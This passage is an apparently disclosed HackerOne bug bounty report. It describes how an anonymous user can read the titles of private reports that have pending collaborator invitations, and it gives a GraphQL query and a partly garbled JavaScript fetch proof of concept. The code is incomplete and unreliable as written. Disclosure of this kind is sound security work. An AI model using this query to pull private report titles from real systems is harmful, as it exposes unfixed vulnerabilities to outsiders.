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HackerOne: View Titles of Private Reports with pending email invitation

Summary: If a private report has a pending email invitation for collaboration, an anonymous user can see the title of the report. This only works for anonymous users, and the collaboration invitation must be through Manage Collaborators invitation panel. Description: Steps To Reproduce As victim: In a report to a bug bounty program, add a collaborator, using any email, such as: ██████████ Save the integer ID of the report. In a new, anonymous/unauthenticated/logged-out session: Send GraphQL request, replacing PRIVATE_REPORT_ID integer: graphql { report(id:IPRIVATE_REPORT_ID){ title } } OR run JS implementation: By visiting as anonymous: “`js const csrf_token = document.getElementsByName("csrf-token")[0].getAttribute("content") const REPORT_ID = PRIVATE_REPORT_ID // integer var resp = await(await fetch("", { "headers": { "accept": "/", "content-type": "application/json", "x-csrf-token": csrf_token, }, "body": JSON.stringify({ "operationName": "HacktivitySearchQuery", "variables": { "reportId": REPORT_ID }, "query": query HacktivitySearchQuery($reportId: Int!) { report(id: $reportId){ id url title } } }), "method": "POST", "mode": "cors", "credentials": "include" })).json() console.log( “` The title of the report is the response, confirming the vulnerability. Impact Can read titles of possibly unfixed reports. This can be…Read More

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